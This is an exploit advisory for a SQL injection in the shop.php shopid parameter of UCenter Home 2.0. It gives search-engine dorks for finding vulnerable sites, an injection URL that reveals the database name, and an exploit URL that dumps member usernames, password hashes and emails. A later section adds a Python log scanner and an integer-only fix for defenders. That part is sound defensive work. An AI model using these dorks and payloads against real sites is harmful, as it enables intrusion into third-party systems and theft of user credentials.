__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
You need the victim database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..
DB : Okey.

Edit the DB name: `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'

Edit : Okey.
Use hex conversion and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
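
For defenders, a log check for requests of the shape shown above. This is an added example, not part of the original advisory and not UCenter Home code. It assumes combined-format web access logs and that a legitimate `shopid` is always a plain integer (as in the advisory's `253`); the function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line of a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')
# Substrings taken from the injection strings quoted in the advisory.
MARKERS = ("information_schema", "floor(rand(", "group by", "uc_members")

def inspect(line):
    """Return the reasons a log line matches this attack, or [] if it does not."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if url.path.rsplit("/", 1)[-1].lower() != "shop.php":
        return []
    reasons = []
    # parse_qs URL-decodes %20 and '+', so encoded payloads are seen in clear.
    for value in parse_qs(url.query, keep_blank_values=True).get("shopid", []):
        if not re.fullmatch(r"[0-9]+", value):
            reasons.append("shopid is not a plain integer")
        low = re.sub(r"\s+", " ", value.lower())
        reasons += ["marker: " + mk for mk in MARKERS if mk in low]
    return reasons

def scan(lines):
    """Return (line_number, reasons) for every suspicious line."""
    return [(n, r) for n, line in enumerate(lines, 1) if (r := inspect(line))]

# Constructed sample log lines (documentation IPs, shortened non-working query).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2011:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2011:10:00:07 +0000] "GET /shop.php?ac=view&shopid=253+and+floor(rand(0)*2)'
    '+from+information_schema.tables+group%20by+x HTTP/1.1" 200 913',
    '203.0.113.9 - - [01/Jan/2011:10:00:09 +0000] "GET /shop.php?ac=view&shopid=abc HTTP/1.1" 200 412',
    '203.0.113.7 - - [01/Jan/2011:10:00:11 +0000] "GET /index.php?shopid=1+group+by+x HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for n, reasons in scan(SAMPLE_LOG):
        print(n, reasons)
```

The same integer-only rule that the check applies to logs is the server-side mitigation: rejecting or casting any non-numeric `shopid` before it reaches the query removes the injection point the advisory describes.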